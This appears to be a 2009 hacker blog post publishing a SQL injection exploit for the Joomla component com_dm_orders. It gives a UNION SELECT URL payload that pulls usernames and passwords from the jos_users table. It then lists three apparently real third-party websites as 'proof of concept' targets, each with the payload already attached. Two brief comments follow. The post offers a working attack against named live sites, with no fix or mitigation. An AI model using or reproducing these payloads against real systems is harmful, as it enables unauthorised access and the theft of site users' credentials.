LFI to RCE via access_log injection

on
18

Joomla Components [ com_dm_orders ] SQL Injection Vuln

on
[o] com_dm_orders SQL Vulnerability
Software : com_dm_orders [ joomla components ]
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/
Home : http://antisecurity.org/



[o] Exploit
http://localhost/[path]/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9+from+jos_users--&Itemid=1

[o] Proof Of Concept
http://www.shop.isecure-key.com/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9+from+jos_users--&Itemid=54
http://www.bluesplayer.dk/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat%28username,0x3a,password%29,3,4,5,6,7,8,9+from+jos_users--&Itemid=56
http://www.yourownconsultingbusiness.com/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat%28username,0x3a,password%29,3,4,5,6,7,8,9+from+jos_users--&Itemid=54

Comments

Anonymous said…
I've been using greensql for a while and all my joomla customers are satisfied, www.greensql.net
December 4, 2009 at 11:52 AM
evilc0de said…
what do you mean by that?
December 6, 2009 at 10:32 AM
Post a Comment